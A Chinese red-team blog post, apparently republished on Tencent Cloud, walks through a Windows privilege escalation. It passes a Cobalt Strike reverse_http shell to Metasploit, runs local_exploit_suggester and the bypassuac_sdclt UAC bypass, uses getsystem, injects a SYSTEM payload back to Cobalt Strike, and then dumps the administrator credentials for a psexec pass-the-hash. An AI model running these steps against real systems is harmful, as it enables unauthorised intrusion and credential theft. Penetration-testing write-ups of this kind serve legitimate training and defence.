前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >有几百个补丁的机器提不下来?利用 Metasploit 试试

有几百个补丁的机器提不下来?利用 Metasploit 试试

作者头像
渗透攻击红队
发布2021-09-02 14:58:09
5310
发布2021-09-02 14:58:09
举报
文章被收录于专栏:漏洞知识库漏洞知识库

大家好,这里是 渗透攻击红队 的第 70 篇文章,本公众号会记录一些红队攻击的案例,不定时更新!请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关!

最近遇到一台机器,打了几百个补丁用各种漏洞提权都无果,最后使用 Metasploit 自带的模块把他的特权提升了,这才提权成功,看文章吧!

利用 Metasploit 进行提权

提权过程

首先是发现目标有 200 多个补丁:

随后我根据补丁号去查询相应的 EXP 去尝试提权发现都失败了,这个时候我把 CobaltStrike 的 Shell 互传到了 Metasploit:

代码语言:javascript
复制
MSF:
use exploit/multi/handler
set payload windows/meterpreter/reverse_http

CS:
创建监听器windows/foreign/reverse_http
执行监听器 spawn msf

然后通过 Metasploit 的提权检测找到了几个 exp :

代码语言:javascript
复制
run post/multi/recon/local_exploit_suggester

然后利用模块尝试提权:

代码语言:javascript
复制
exploit/windows/local/bypassuac_sdclt

这个时候弹回来了一个 Meterpreter,发现用户没变,但是当前特权多了很多:

然后直接 getsystem 提权到 SYSTEM:

最后利用 Metasploit 把 SYSYEM 的 shell 传到 CobaltStrike:

代码语言:javascript
复制
MSF:
background
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set session 3
run

CS:
windows/beacon_http/reverse_http

这个时候目标 user 还是没改变,但是实际上特权已经有了!可以直接 getsystem:

最后抓到 administrator 的密码后,利用本地管理员的账号 hash ,直接本地 psexec 利用本地 administrator 的密码上线:

这个时候发现就是一个 SYSTEM 的 Beacon 会话了!实战情况下 CobaltStrike 提权不成功,就尝试利用 Metasploit 来尝试提权,兴许会有办法!

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2021-08-21,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 渗透攻击红队 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档